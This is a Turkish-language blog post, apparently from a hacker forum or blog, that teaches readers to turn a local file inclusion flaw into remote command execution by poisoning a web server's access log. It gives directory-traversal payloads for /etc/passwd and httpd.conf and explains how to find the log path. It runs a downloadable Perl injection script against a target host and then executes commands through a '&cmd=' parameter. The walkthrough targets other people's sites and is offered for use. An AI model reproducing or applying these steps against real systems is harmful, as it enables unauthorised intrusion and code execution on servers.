Newest Post
// On :27 Haziran 2019 Perşembe
Merhaba arkadaşlar bugün sizlere
siteleri access_log inject ederek lfı siteleri rfı çevirmeyi anlatacağım rfı çevirmekten kastım komut çalıştırmak
sitemizi bulduk arkadaşlar şimdi sitede lfı varmı kontrol ediyoruz
../../../../../../../../../../../../../../../etc/passwd denedik ama olmadı arkadaşlar
şimdi sonuna ekleyerek bypasslıyoruz yani şu şekilde
../../../../../../../../../../../../../../../etc/passwd
şimdi access_logun dizinini bulmak için /etc/httpd/conf/httpd.conf yapıyoruz
ve ctrl+u yapıyoruz ve kendi sitemizi kaynak kodlarında arıyoruz
gördüğünüz gibi 1523 satırda access_log dizini bulduk dizini /home/pro_99/null.com/access_log
1513 satıra bakacak olursak 12.34.5.678:80 (12.34.5.678 temsilidir) server ip ve 80 portunu görüyoruz bu port işimize yarayacak bir kaç adım sonra
şimdi size bi perl script vereceğim onla siteye inject edeceğiz
perl scriptadı.pl hedef.com 80
burdaki 80 daha önce serverde vardı :80 şeklinde buraya serverde açık herangi portu girebilirsiniz
script indir --> http://link.tl/2hVQE
şimdi siteye gidin ve ../../../../../../../../../../../../../../../home/pro_99/null.com/access_log
girin ekranda v0pcr3w arayın eğer ordaysa başarılı olmuş demektir
sitede ../../../../../../../../../../../../../../../home/pro_99/null.com/access_log&cmd= şeklinde artık komut çalıştırabilirsiniz ben id komutuna bakacağım çalışıp çalışmadığını görün diye yukarda gördüğünüz gibi çalışıyor
Kayıtlar
